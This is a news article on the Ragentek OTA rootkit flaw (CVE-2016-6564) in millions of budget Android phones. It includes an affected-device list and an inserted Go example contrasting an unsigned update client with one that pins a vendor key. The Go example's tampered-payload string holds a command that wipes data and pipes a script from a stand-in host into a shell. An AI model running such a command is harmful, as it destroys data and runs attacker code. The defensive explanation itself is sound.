
Backdoor/Rootkit Comes Pre-installed

Here's some bad news for Android users again.

Nearly 3 Million Android devices worldwide are vulnerable to man-in-the-middle (MITM) attacks that could allow attackers to remotely execute arbitrary code with root privileges, turning over full control of the devices to hackers.

According to a new report from security rating firm BitSight, the issue is an insecure implementation of the OTA (Over-the-Air) update mechanism used by certain low-cost Android devices, including the BLU Studio G sold in the US by Best Buy.

Backdoor/Rootkit Comes Pre-installed

The vulnerable OTA mechanism, which is associated with Chinese mobile firm Ragentek Group, contains a hidden binary, /system/bin/debugs, that runs with root privileges and communicates with three hardcoded hosts over unencrypted channels.

According to the researchers, this privileged binary not only exposes user-specific information to MITM attackers but also acts as a rootkit, potentially allowing attackers to remotely execute arbitrary commands on affected devices as a privileged user.

"Additionally, there are multiple techniques used to hide the execution of this binary. This behavior could be described as a rootkit," the CERT advisory associated with this vulnerability warned on Thursday.

Similar to the flaw discovered in Android devices running firmware from Shanghai ADUPS Technology, the newly discovered flaw (designated CVE-2016-6564) also resides in firmware developed by a Chinese company.

While the AdUps firmware was caught stealing user and device information, the Ragentek firmware neither encrypts the communications the smartphones send and receive nor relies on code signing to verify what it downloads and installs.

This blunder could allow a remote attacker to extract personal information from an affected device, remotely wipe the whole device, and even use it as a foothold to reach other systems on a corporate network and steal sensitive data.
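The two missing controls, transport encryption and code signing, are easiest to see side by side. The following is an added example, not code from the original article or from the Ragentek or BLU firmware: a toy OTA client in Go that models the vulnerable design (accept whatever the hardcoded host returns and hand it to a root installer) next to a hardened one that only accepts a package whose ed25519 signature verifies against a vendor public key pinned in the firmware image. The update payloads, host name, key pairs and the three delivery scenarios (a genuine update, the same update tampered in transit by a man in the middle, and a package signed by an attacker who has taken over one of the preconfigured domains) are all constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Update models what the OTA endpoint hands back to the on-device client.
// In the vulnerable design described on the page, no signature exists at all.
type Update struct {
	Package   []byte // the payload the privileged binary will act on
	Signature []byte // detached ed25519 signature over sha256(Package)
}

// insecureAccept is the vulnerable pattern: whatever arrives from the hardcoded
// host over plaintext HTTP is accepted and passed to a root-privileged installer.
// Anyone on the network path, or anyone who owns the host name, chooses the payload.
func insecureAccept(u Update) ([]byte, error) {
	return u.Package, nil
}

// secureAccept is the hardened pattern: the client only accepts a package whose
// signature verifies under the vendor public key pinned into the firmware image.
// TLS still matters for the confidentiality of what the device reports home, but it
// is this check that stops an attacker-supplied package from ever being installed.
func secureAccept(vendorPub ed25519.PublicKey, u Update) ([]byte, error) {
	if len(u.Signature) != ed25519.SignatureSize {
		return nil, errors.New("rejected: missing or malformed signature")
	}
	digest := sha256.Sum256(u.Package)
	if !ed25519.Verify(vendorPub, digest[:], u.Signature) {
		return nil, errors.New("rejected: signature does not verify against pinned vendor key")
	}
	return u.Package, nil
}

// signUpdate is what the legitimate build pipeline does with the vendor's private key.
func signUpdate(priv ed25519.PrivateKey, pkg []byte) Update {
	digest := sha256.Sum256(pkg)
	return Update{Package: pkg, Signature: ed25519.Sign(priv, digest[:])}
}

// Outcome records, for one delivery scenario, whether each client accepted the package.
type Outcome struct {
	Scenario         string
	InsecureAccepted bool
	SecureAccepted   bool
}

// runScenarios exercises both clients against three constructed deliveries (hypothetical
// payloads and keys generated here, not taken from any real device or report).
func runScenarios() ([]Outcome, error) {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}

	genuine := signUpdate(vendorPriv, []byte("install /system/app/VendorUpdate.apk"))

	// MITM on plaintext HTTP: the signature is untouched but the bytes on the wire were swapped.
	tampered := genuine
	tampered.Package = []byte("sh -c 'rm -rf /data; curl http://evil.example/x | sh'")

	// Domain takeover: the attacker's host serves a package signed with a key of their own.
	takeover := signUpdate(attackerPriv, []byte("pm install /sdcard/implant.apk"))

	deliveries := []struct {
		name string
		u    Update
	}{
		{"genuine vendor update", genuine},
		{"MITM-tampered update", tampered},
		{"attacker-signed update from hijacked domain", takeover},
	}

	var out []Outcome
	for _, d := range deliveries {
		_, insecureErr := insecureAccept(d.u)
		_, secureErr := secureAccept(vendorPub, d.u)
		out = append(out, Outcome{d.name, insecureErr == nil, secureErr == nil})
	}
	return out, nil
}

func main() {
	outcomes, err := runScenarios()
	if err != nil {
		panic(err)
	}
	for _, o := range outcomes {
		fmt.Printf("%-45s insecure client accepted=%-5v pinned-key client accepted=%v\n",
			o.Scenario, o.InsecureAccepted, o.SecureAccepted)
	}
}
```

The point of the third scenario is that registering the unused domains, as the researchers did, only removes the cheapest attack path; a client that verifies signatures against a pinned key rejects an attacker's package whether it arrives through a hijacked domain or a man in the middle, and that is the fix a vendor patch needs to contain.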

Affected Android Devices

The vulnerability has been found in multiple smartphone handsets from BLU Products, along with over a dozen devices from other vendors. The list of affected Android handsets includes:

  • BLU Studio G
  • BLU Studio G Plus
  • BLU Studio 6.0 HD
  • BLU Studio X
  • BLU Studio X Plus
  • BLU Studio C HD
  • Infinix Hot X507
  • Infinix Hot 2 X510
  • Infinix Zero X506
  • Infinix Zero 2 X509
  • DOOGEE Voyager 2 DG310
  • LEAGOO Lead 5
  • LEAGOO Lead 6
  • LEAGOO Lead 3i
  • LEAGOO Lead 2S
  • LEAGOO Alfa 6
  • IKU Colorful K45i
  • Beeline Pro 2
  • XOLO Cube 5.0

While analyzing the flaw, AnubisNetworks found that the device, a BLU Studio G, attempted to contact three pre-configured Internet domains, two of which remained unregistered despite being hardwired into the Ragentek firmware that introduced the bug.

"This OTA binary was distributed with a set of domains preconfigured in the software. Only one of these domains was registered at the time of the discovery of this issue," BitSight's subsidiary company Anubis Networks says in its report published Thursday. 
"If an adversary had noticed this, and registered these two domains, they would’ve instantly had access to perform arbitrary attacks on almost 3,000,000 devices without the need to perform a man-in-the-middle attack."

After the discovery, AnubisNetworks researchers registered the two extraneous domains themselves and still control them, so that nobody else can use them to push commands to the affected devices.

Around 3 Million Devices contain Dangerous Rootkit

Still, the impact is significant. The researchers were able to exploit the backdoor on a BLU Studio G and install a file in the location reserved for apps that run with full system privileges.

By observing the data the smartphones sent when they connected to the two domains registered by BitSight, the researchers cataloged 55 reported device models that are affected.

"We have observed over 2.8 Million distinct devices, across roughly 55 reported device models, which have checked into our sinkholes since we registered the extraneous domains," the report reads.
"In some cases, we have not been [able] to translate the provided device model into a reference to the real-world device."

So far, only BLU Products has issued a software update to address the vulnerability, and BitSight researchers have not yet tested the patch to confirm that it closes the hole. The remaining devices on the list should be assumed to still be affected.

For more technical details about the vulnerability, head to the full report published by BitSight's AnubisNetworks.

This is the second case in a single week when researchers have warned you of Android smartphones coming pre-installed with backdoors that not only send massive amounts of your personal data to Chinese servers, but also allow hackers to take control of your device.

Comments

  1. I want to set up a roadrunner email account for effective and clear communication. I don’t have a strong and full technical background for the proper and full roadrunner email setup process.

